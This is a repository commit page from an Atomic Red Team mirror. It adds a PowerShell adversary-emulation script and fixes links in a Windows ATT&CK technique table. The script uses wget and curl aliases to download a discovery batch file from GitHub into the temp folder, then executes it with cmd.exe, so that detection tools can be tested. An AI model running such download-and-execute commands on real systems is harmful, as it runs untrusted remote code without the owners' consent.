infosecn1nja
/
atomic-red-team
mirror of https://github.com/infosecn1nja/atomic-red-team.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #41 from redcanaryco/Argonaut 

Argonaut Chain Reaction + Updates to windows.md
patch-1
caseysmithrc 2017-12-06 15:27:35 -07:00 committed by GitHub
parent cf124cd5d4 5449cc27f0
commit 4326601868
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
2 changed files with 26 additions and 7 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

19
ARTifacts/Chain_Reactions/chain_reaction_Argonaut.ps1 Normal file
View File

@ -0,0 +1,19 @@
# Chain Reaction: Argonaut
# Tactics: Execution:Powershell, Discovery
# variable can be changed to $userprofile to drop the bat elsewhere
# TEMP=C:\Users\<username>\AppData\Local\Temp
$temp = $env:temp
# Note that these are alias' for Invoke-WebRequest.
# The concept is to see how curl and wget look in you detection tools vs what is commonly used (IWR, Invoke-WebRequest, etc)
wget https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/Discovery.bat -OutFile $temp\1.bat
# Alternate Ending: Using curl
curl https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/Discovery.bat -OutFile $temp\2.bat
# Execute the 1.bat file
cmd.exe /c $temp\1.bat

14
Windows/README.md
View File

@ -10,14 +10,14 @@
| [Change Default File Association](Persistence/Change_Default_File_Association.md) | [DLL Injection](Privilege%20Escalation/DLL%20Injection.md) | [Component Object Model Hijacking](Persistence/Component_Object_Model_Hijacking.md) | Exploitation of Vulnerability | Peripheral Device Discovery | Remote Desktop Protocol | [InstallUtil](Execution/InstallUtil.md) | Data from Network Shared Drive | Exfiltration Over Command and Control Channel | Data Encoding |
| Component Firmware | DLL Search Order Hijacking | [DLL Injection](Privilege%20Escalation/DLL%20Injection.md) | [Input Capture](Collection/Input_Capture.md) | Permission Groups Discovery | Remote File Copy | [PowerShell](Execution/PowerShell.md) | Data from Removable Media | Exfiltration Over Other Network Medium | Data Obfuscation |
| Component Object Model Hijacking | Exploitation of Vulnerability | DLL Search Order Hijacking | Network Sniffing | Process Discovery | Remote Services | Process Hollowing | Email Collection | Exfiltration Over Physical Medium | Fallback Channels |
| DLL Search Order Hijacking | File System Permissions Weakness | DLL Side-Loading | Private Keys | [Query Registry](Discovery/Query%20Registry.md) | Replication Through Removable Media | [Regsvcs/Regasm](Execution/RegsvcsRegasm.md) | Input Capture | Scheduled Transfer | Multi-Stage Channels |
| External Remote Services | Local Port Monitor | [Deobfuscate/Decode Files or Information](Defense Evasion/Deobfuscate_Decode_Files_Or_Information.md) | Two-Factor Authentication Interception | [Remote System Discovery](Discovery/Remote%20System%20Discovery.md) | Shared Webroot | [Regsvr32](Execution/Regsvr32.md) | Screen Capture | | Multiband Communication |
| DLL Search Order Hijacking | File System Permissions Weakness | DLL Side-Loading | Private Keys | [Query Registry](Discovery/Query_Registry.md) | Replication Through Removable Media | [Regsvcs/Regasm](Execution/RegsvcsRegasm.md) | Input Capture | Scheduled Transfer | Multi-Stage Channels |
| External Remote Services | Local Port Monitor | [Deobfuscate/Decode Files or Information](Defense Evasion/Deobfuscate_Decode_Files_Or_Information.md) | Two-Factor Authentication Interception | [Remote System Discovery](Discovery/Remote_System_Discovery.md) | Shared Webroot | [Regsvr32](Execution/Regsvr32.md) | Screen Capture | | Multiband Communication |
| File System Permissions Weakness | [New Service](Persistence/Service_Installation.md) | Disabling Security Tools | | [Security Software Discovery](Discovery/Security_Software_Discovery.md) | Taint Shared Content | Rundll32 | Video Capture | | Multilayer Encryption |
| Hidden Files and Directories | Path Interception | Exploitation of Vulnerability | | [System Information Discovery](Discovery/System%20Information%20Discovery.md) | Third-party Software | [Scheduled Task](Persistence/Scheduled_Task.md) | | | Remote File Copy |
| Hypervisor | [Scheduled Task](Persistence/Scheduled_Task.md) | [File Deletion](Defense%20Evasion/File_Deletion.md) | | System Network Configuration Discovery | [Windows Admin Shares](Lateral%20Movement/Windows%20Admin%20Shares.md) | Scripting | | | Standard Application Layer Protocol |
| Hidden Files and Directories | Path Interception | Exploitation of Vulnerability | | [System Information Discovery](Discovery/System_Information_Discovery.md) | Third-party Software | [Scheduled Task](Persistence/Scheduled_Task.md) | | | Remote File Copy |
| Hypervisor | [Scheduled Task](Persistence/Scheduled_Task.md) | [File Deletion](Defense%20Evasion/File_Deletion.md) | | [System Network Configuration Discovery](Discovery/System_Network_Configuration_Discovery.md) | [Windows Admin Shares](Lateral%20Movement/Windows%20Admin%20Shares.md) | Scripting | | | Standard Application Layer Protocol |
| Local Port Monitor | Service Registry Permissions Weakness | File System Logical Offsets | | System Network Connections Discovery | Windows Remote Management | Service Execution | | | Standard Cryptographic Protocol |
| Logon Scripts | Valid Accounts | Hidden Files and Directories | | [System Owner/User Discovery](Discovery/System%20Owner-User%20Discovery.md) | | Third-party Software | | | Standard Non-Application Layer Protocol |
| Modify Existing Service | Web Shell | Indicator Blocking | | System Service Discovery | | Trusted Developer Utilities | | | Uncommonly Used Port |
| Logon Scripts | Valid Accounts | Hidden Files and Directories | | [System Owner/User Discovery](Discovery/System_Owner-User_Discovery.md) | | Third-party Software | | | Standard Non-Application Layer Protocol |
| Modify Existing Service | Web Shell | Indicator Blocking | | [System Service Discovery](Discovery/System_Service_Discovery.md) | | Trusted Developer Utilities | | | Uncommonly Used Port |
| [Netsh Helper DLL](Persistence/Netsh_Helper_DLL.md) | | Indicator Removal from Tools | | [System Time Discovery](Discovery/System_Time_Discovery.md) | | [Windows Management Instrumentation](Execution/Windows_Management_Instrumentation.md) | | | Web Service |
| New Service | | [Indicator Removal on Host](Defense%20Evasion/Indicator_Removal_on_Host.md) | | | | [Windows Remote Management](Lateral%20Movement/Windows%20Remote%20Management.md) | | | |
| Office Application Startup | | Install Root Certificate | | | | [Bitsadmin](Execution/Bitsadmin.md) | | | |
@ -35,6 +35,6 @@
| Winlogon Helper DLL | | [Rundll32](Execution/Rundll32.md) | | | | | | | |
| | | Scripting | | | | | | | |
| | | Software Packing | | | | | | | |
| | | [Timestomp](Defense%20Evasion/Timestomp.md | | | | | | | |
| | | [Timestomp](Defense%20Evasion/Timestomp.md) | | | | | | | |
| | | [Trusted Developer Utilities](Execution/Trusted_Developer_Utilities.md) | | | | | | | |
| | | Valid Accounts | | | | | | | |